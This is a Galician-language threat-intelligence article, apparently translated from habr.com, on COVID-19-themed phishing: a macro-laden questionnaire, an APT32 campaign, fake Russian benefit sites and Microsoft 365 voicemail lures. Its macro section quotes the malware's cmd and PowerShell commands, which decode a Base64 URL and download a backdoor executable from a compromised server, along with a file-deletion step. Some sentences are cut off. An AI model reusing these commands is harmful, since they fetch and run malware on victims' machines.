Os atacantes seguen explotando o tema COVID-19, creando cada vez máis ameazas para os usuarios que están moi interesados en todo o relacionado coa epidemia. EN
Lembra en
Queres unha proba gratuíta para o COVID-19?
Outro exemplo significativo de phishing con temática de coronavirus foi
Tamén foi sinxelo convencer á maioría dos usuarios de que activasen macros. Para iso, utilizouse un truco estándar: para cubrir o cuestionario, primeiro cómpre activar as macros, o que significa que cómpre executar un script VBA.
Como podes ver, o script VBA está especialmente enmascarado de antivirus.
Windows ten unha función de espera na que a aplicación espera /T <segundos> antes de aceptar a resposta predeterminada "Si". No noso caso, o script esperou 65 segundos antes de eliminar os ficheiros temporais:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
E mentres esperaba, descargouse malware. Lanzouse un script PowerShell especial para isto:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Despois de decodificar o valor Base64, o script de PowerShell descarga a porta traseira situada no servidor web previamente pirateado de Alemaña:
http://automatischer-staubsauger.com/feature/777777.png
e gárdao co nome:
C:UsersPublictmpdirfile1.exe
Dobrador ‘C:UsersPublictmpdir’
elimínase ao executar o ficheiro 'tmps1.bat' que contén o comando cmd /c mkdir ""C:UsersPublictmpdir"".
Ataque dirixido a organismos gobernamentais
Ademais, os analistas de FireEye informaron recentemente dun ataque APT32 dirixido a estruturas gobernamentais en Wuhan, así como ao Ministerio de Xestión de Emerxencias chinés. Un dos RTF distribuídos contiña unha ligazón a un artigo do New York Times titulado
Curiosamente, no momento da detección, ningún dos antivirus detectou esta instancia, segundo Virustotal.
Cando os sitios web oficiais están caídos
O exemplo máis rechamante dun ataque de phishing ocorreu en Rusia o outro día. O motivo foi o nomeamento dunha prestación moi esperada para nenos de 3 a 16 anos. Cando se anunciou o inicio da aceptación de solicitudes o 12 de maio de 2020, millóns de persoas acudiron ao sitio web de Servizos estatais en busca de axuda tan esperada e derrubaron o portal non peor que un ataque DDoS profesional. Cando o presidente dixo que "os servizos gobernamentais non podían facer fronte ao fluxo de solicitudes", a xente comezou a falar en liña sobre o lanzamento dun sitio alternativo para aceptar solicitudes.
O problema é que varios sitios comezaron a funcionar á vez, e mentres un, o real en posobie16.gosuslugi.ru, acepta solicitudes, máis
Os compañeiros de SearchInform atoparon uns 30 novos dominios fraudulentos na zona .ru. Infosecurity e Softline Company rastrexaron máis de 70 sitios web de servizos gobernamentais falsos similares desde principios de abril. Os seus creadores manipulan símbolos coñecidos e tamén usan combinacións das palabras gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, etc.
Hype e enxeñería social
Todos estes exemplos só confirman que os atacantes están a monetizar con éxito o tema do coronavirus. E canto maior sexa a tensión social e os problemas máis pouco claros, máis posibilidades teñen os estafadores de roubar datos importantes, obrigar á xente a renunciar ao seu diñeiro por conta propia ou simplemente piratear máis ordenadores.
E dado que a pandemia obrigou a persoas potencialmente non preparadas a traballar desde casa en masa, non só os datos persoais, senón tamén os corporativos están en risco. Por exemplo, recentemente os usuarios de Microsoft 365 (anteriormente Office 365) tamén foron sometidos a un ataque de phishing. A xente recibiu mensaxes de voz masivas "perdidas" como anexos a cartas. Non obstante, os ficheiros eran en realidade unha páxina HTML á que enviaban as vítimas do ataque
Fonte: www.habr.com